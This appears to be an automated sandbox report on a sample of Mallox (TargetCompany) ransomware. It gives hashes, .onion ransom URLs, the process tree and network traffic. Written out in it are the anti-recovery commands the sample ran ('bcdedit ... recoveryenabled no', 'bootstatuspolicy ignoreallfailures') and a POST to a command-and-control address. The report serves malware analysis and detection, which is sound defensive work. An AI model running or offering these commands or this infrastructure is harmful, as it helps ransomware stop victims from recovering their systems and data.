Analysis
max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20240508-en
resource tags
arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted
31/05/2024, 04:05 UTC
Static task
static1
Behavioral task
behavioral1
Sample
ld.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
ld.exe
Resource
win10v2004-20240426-en
General
Target
ld.exe
Size
478KB
MD5
71efe7a21da183c407682261612afc0f
SHA1
0f1aea2cf0c9f2de55d2b920618a5948c5e5e119
SHA256
45a236e7aa80515aafb6c656c758faad6e77fb435b35bfa407aef3918212078d
SHA512
3cff597dbd7f0d5ab45b04e3c3731e38626b7b082a0ede7ab9a7826921848edb3c033f640da2cb13916febf84164f7415ca9ac50c3d927f04d9b61fcadb7801c
SSDEEP
6144:W0wmbI4/Z4SHvrxw6zaIST1w9wEPDasWxxsBhS37b8o6XCFyPwCMa6qnXxq/y:7zv66zaISTW9asWxxAh4IlXC4PUqBq/
Malware Config
Extracted
C:\HOW TO BACK FILES.txt
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
TargetCompany,Mallox
TargetCompany (aka Mallox) is ransomware that encrypts files using a combination of ChaCha20, AES-128, and Curve25519; it was first seen in June 2021.
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process
3000 bcdedit.exe
292 bcdedit.exe
Renames multiple (7221) files with added filename extension
This suggests ransomware activity: encrypting all the files on the system.
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description: File opened (read-only)   Process: ld.exe
ioc: \??\Q: \??\R: \??\S: \??\V: \??\Z: \??\B: \??\G: \??\I: \??\M: \??\O: \??\D: \??\H: \??\K: \??\N: \??\T: \??\X: \??\A: \??\J: \??\L: \??\W: \??\Y: \??\E: \??\P: \??\U:
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc
4 api.ipify.org
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process
788 ld.exe
788 ld.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target
PID 788 wrote to memory of 852 788 ld.exe 28
PID 788 wrote to memory of 852 788 ld.exe 28
PID 788 wrote to memory of 852 788 ld.exe 28
PID 788 wrote to memory of 2272 788 ld.exe 30
PID 788 wrote to memory of 2272 788 ld.exe 30
PID 788 wrote to memory of 2272 788 ld.exe 30
PID 852 wrote to memory of 3000 852 cmd.exe 32
PID 852 wrote to memory of 3000 852 cmd.exe 32
PID 852 wrote to memory of 3000 852 cmd.exe 32
PID 2272 wrote to memory of 292 2272 cmd.exe 33
PID 2272 wrote to memory of 292 2272 cmd.exe 33
PID 2272 wrote to memory of 292 2272 cmd.exe 33
System policy modification 1 TTPs 1 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" ld.exe
Processes
C:\Users\Admin\AppData\Local\Temp\ld.exe
  "C:\Users\Admin\AppData\Local\Temp\ld.exe"
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:788
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      - Suspicious use of WriteProcessMemory
      PID:852
        C:\Windows\system32\bcdedit.exe
          bcdedit /set {current} bootstatuspolicy ignoreallfailures
          - Modifies boot configuration data using bcdedit
          PID:3000
    C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
      - Suspicious use of WriteProcessMemory
      PID:2272
        C:\Windows\system32\bcdedit.exe
          bcdedit /set {current} recoveryenabled no
          - Modifies boot configuration data using bcdedit
          PID:292
Network
Remote address: 8.8.8.8:53
Request: api.ipify.org IN A
Response:
api.ipify.org IN A 104.26.13.205
api.ipify.org IN A 172.67.74.152
api.ipify.org IN A 104.26.12.205
Remote address: 104.26.13.205:80
Request:
GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.ipify.org
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 88c41582cfc360f4-LHR
Remote address: 91.215.85.135:80
Request:
POST /QWEwqdsvsf/ap.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 91.215.85.135
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Fri, 31 May 2024 04:05:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.3-4ubuntu2.22
Vary: Accept-Encoding
152 B 3
413 B 402 B 6 4
HTTP Request: GET http://api.ipify.org/
HTTP Response: 200
617 B 471 B 6 5
HTTP Request: POST http://91.215.85.135/QWEwqdsvsf/ap.php
HTTP Response: 200
152 B 3
152 B 3
152 B 3
MITRE ATT&CK Enterprise v15
Downloads
Filesize
910B
MD5
a7b412d53744336e36379c3af0349d0a
SHA1
8a945c13343cec216b5a1c8b7b6554d61b61ce62
SHA256
b86fbabb7ede0feb1ea3de4e865d63e5ec3b1bc1a7cf740a3504c315707049ab
SHA512
f12cabb10812ebf7b9f4cdbb6888f4671f8f13a404a805cbfd4147f7184329de05b271041b51e5acd1a2af5bf8e87a4fd99cd5b7b3f074866405c527416407e1